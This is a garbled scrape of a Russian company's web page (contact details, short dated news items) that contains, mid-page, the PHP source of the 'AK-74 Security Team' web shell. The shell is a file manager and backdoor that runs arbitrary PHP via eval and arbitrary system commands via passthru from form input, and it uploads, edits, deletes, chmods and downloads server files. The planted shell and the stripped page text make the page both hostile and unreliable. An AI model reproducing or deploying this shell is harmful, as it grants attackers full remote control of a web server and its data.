-. -
: (495) 645-6751
     (495) 221-05-10 . 5514
e-mail:  gai-c@gai-c.ru
 
 
04.03.2010  w
AK-74 Security Team Web Shell A:link { COLOR: #4d6d91; TEXT-DECORATION: underline } A:active { COLOR: #4d6d91; TEXT-DECORATION: underline } A:visited { COLOR: #4d6d91; TEXT-DECORATION: underline } A:hover { COLOR: #C10000; TEXT-DECORATION: underline } TD { FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica } BODY { FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; }
"; return $res; } function outputmenu() { $res = ""; $res .= ""; return $res; } function outputdown() { $res = ""; $res .= "
.:: :[ AK-74 Security Team Web-shell ]: ::.
phpinfo() PHP
"; return $res; } function outputfilemanager() { $res = ""; $number = 0; $dirs = $this->getdirs(); $files = $this->getfiles(); sort($dirs); sort($files); $res .= " :".$_SESSION["currentdir"]."     ,         "; for ($i = 0; $i < count($dirs); $i++) { $res .= "".(++$number)."".$dirs[$i]."  "; $res .= "".($this->getpermission($_SESSION["currentdir"]."/".$dirs[$i])).""; $res .= " delete"; } for ($i = 0; $i < count($files); $i++) { $res .= "".(++$number).""; $res .= "".$files[$i]["filename"].""; $res .= "  ".$files[$i]["filesize"].""; $res .= "".$files[$i]["lastmod"].""; $res .= "".($this->getpermission($_SESSION["currentdir"]."/".$files[$i]["filename"])).""; $res .= "edit"; $res .= "delete"; } $res .= "
"; $res .= ""; $res .= ""; $res .= ""; $res .= ""; $res .= "
:  
:
:
"; $res .= ""; return $res; } function outputinfo() { $res = ""; $res .= "
Copyright AK-74 Security Team 2005 - ".date("Y")."

    1. OS - ".(php_uname())."

    2. PHP - ".(phpversion())."

    3. User - ".( get_current_user())." || User ID - ".( getmyuid())." || Group ID - ".( getmygid ())."

    4. Server Software - ".(getenv("SERVER_SOFTWARE"))."

    5. Request Method - ".(getenv("REQUEST_METHOD"))."

    6. Server IP - ".(getenv("SERVER_ADDR"))."

    7. Your IP - ".(getenv("REMOTE_ADDR"))."

    8. X Forwarded For IP - ".(getenv("HTTP_X_FORWARDED_FOR"))."
"; return $res; } function chmodform($file) { $perms = $this->getpermissionarray($file); $res = ""; $res .= "" ." "; return $res; } function editfileform($file) { $fp = fopen($file,"r"); if (!$fp) return " "; $res = ""; $res .= "" .""; fclose($fp); return $res; } function executeform() { $res = ""; $res .= "
Copyright AK-74 Security Team 2005 - ".date("Y")."
"; $res .= ""; $res .= ""; for ($i = 1; $i <= 9; $i++) $res .= ""; $res .= ""; $res .= "
 rwxrwxrwx
".$perms[0]." 
 
"; $res .= ""; $res .= ""; $res .= "
".(htmlspecialchars(fread($fp, filesize($file))))."
Rename: -
PHP-
PHP ( <? ?> ) !
"; $res .= "
 
"; return $res; } function execute() { echo "
"; echo " 
   "; eval(stripslashes($_POST["phpcode"])); echo "
"; echo "
"; } function exesysform() { $res = ""; $res .= "
Copyright AK-74 Security Team 2005 - ".date("Y")."
Execute system commands!
"; $res .= "
 
"; return $res; } function exesys() { echo "
"; echo " 
   "; $result = passthru($_POST["cmmd"]); echo "
"; echo "
"; } function editfile($file) { if (!empty($_POST["rename"])) { rename ($_POST["file"], $_POST["rename"]); } $fp = fopen($_POST["rename"],"w"); if (!$fp) return 0; fwrite($fp, stripslashes($_POST["filecontent"])); fclose($fp); return 1; } function chmodfile($file) { $res = 0; switch ($_POST["perms0"]) { case "s": $res = $res | 0xC000; break; case "l": $res = $res | 0xA000; break; case "-": $res = $res | 0x8000; break; case "b": $res = $res | 0x6000; break; case "d": $res = $res | 0x4000; break; case "c": $res = $res | 0x2000; break; case "p": $res = $res | 0x1000; break; case "u": break; } if (isset($_POST["perms1"])) $res = $res | 0x0100; if (isset($_POST["perms2"])) $res = $res | 0x0080; if (isset($_POST["perms3"])) $res = $res | 0x0040; if (isset($_POST["perms4"])) $res = $res | 0x0020; if (isset($_POST["perms5"])) $res = $res | 0x0010; if (isset($_POST["perms6"])) $res = $res | 0x0008; if (isset($_POST["perms7"])) $res = $res | 0x0004; if (isset($_POST["perms8"])) $res = $res | 0x0002; if (isset($_POST["perms9"])) $res = $res | 0x0001; echo substr(sprintf("%o", $res), -4); return chmod($file,intval(substr(sprintf("%o", $res), -4),8)); } function downloadfile($file) { header ("Content-Type: application/octet-stream"); header ("Content-Length: " . filesize($file)); header ("Content-Disposition: attachment; filename=$file"); readfile($file); die(); } function createdir() { if (!empty($_POST["dircreate"])) if (mkdir($_SESSION["currentdir"]."/".$_POST["dircreate"])) return " !"; return " "; } function createfile() { if (!empty($_POST["filecreate"])) { if (file_exists($_SESSION["currentdir"]."/".$_POST["filecreate"])) return " "; $fp = fopen($_SESSION["currentdir"]."/".$_POST["filecreate"],"w"); if ($fp) { fclose($fp); return " !"; } } return " "; } function uploadfile() { if ($_FILES["filename"]["error"] != 0) return "121212"; $_POST["filename2"] = trim($_POST["filename2"]); if (empty($_POST["filename2"])) $_POST["filename2"] = $_FILES["filename"]["name"]; if (!copy($_FILES["filename"]["tmp_name"],$_SESSION["currentdir"]."/".$_POST["filename2"])) if (!move_uploaded_file($_FILES["filename"]["tmp_name"],$_SESSION["currentdir"]."/".$_POST["filename2"])) return " ..."; return " !"; } } $shell = new shell(); $timestart = $shell->getmicrotime(); $content = ""; if (!isset($_SESSION["currentdir"])) $_SESSION["currentdir"] = str_replace("","/",$_SERVER["DOCUMENT_ROOT"]); if (isset($_GET["dir"])) { if (opendir(realpath($_SESSION["currentdir"]."/".$_GET["dir"]))) $_SESSION["currentdir"] = realpath($_SESSION["currentdir"]."/".$_GET["dir"]); Header("Location: $xshell?act=filemanager"); } $_SESSION["currentdir"] = str_replace("","/",$_SESSION["currentdir"]); if (substr($_SESSION["currentdir"],-1,1) == "/") $_SESSION["currentdir"] = substr($_SESSION["currentdir"],0,-1); switch ($_POST["action"]) { case "chmod": if($shell->chmodfile($_POST["file"])) $content .= " "; break; case "editfile": if ($shell->editfile($_POST["file"])) $content .= " "; break; case "execute": $shell->execute(); break; case "exesys": $shell->exesys(); break; case "mkdir": $content .= $shell->createdir(); break; case "createfile": $content .= $shell->createfile(); break; case "uploadfile": $content .= $shell->uploadfile(); break; } $content .= $shell->outputhead(); $content .= $shell->outputmenu(); switch ($_GET["act"]) { case "edit": $content .= $shell->editfileform($_GET["file"]); break; case "chmod": $content .= $shell->chmodform($_GET["file"]); break; case "down": $content .= $shell->downloadfile($_GET["file"]); break; case "filemanager": if ($_GET["act2"] == "del") $content .= $shell->removefile(); $content .= $shell->outputfilemanager(); if ($_GET["act3"] == "del") $content .= $shell->removedir(); break; case "phpinfo": phpinfo(); die(); break; case "info": $content .= $shell->outputinfo(); break; case "execute": $content .= $shell->executeform(); break; case "exesys": $content .= $shell->exesysform(); break; } $content .= $shell->outputdown(); echo $content; echo " : ".($shell->getmicrotime()-$timestart).""; ?>
Copyright AK-74 Security Team 2005 - ".date("Y")."


01.02.2006   -
. , , -.

29.01.2006  
( ) ( .. ..), (), ...


 
 
-
- , , , .

Copyright © "-" 2001-2005,
 @Mail.ru
, , , , .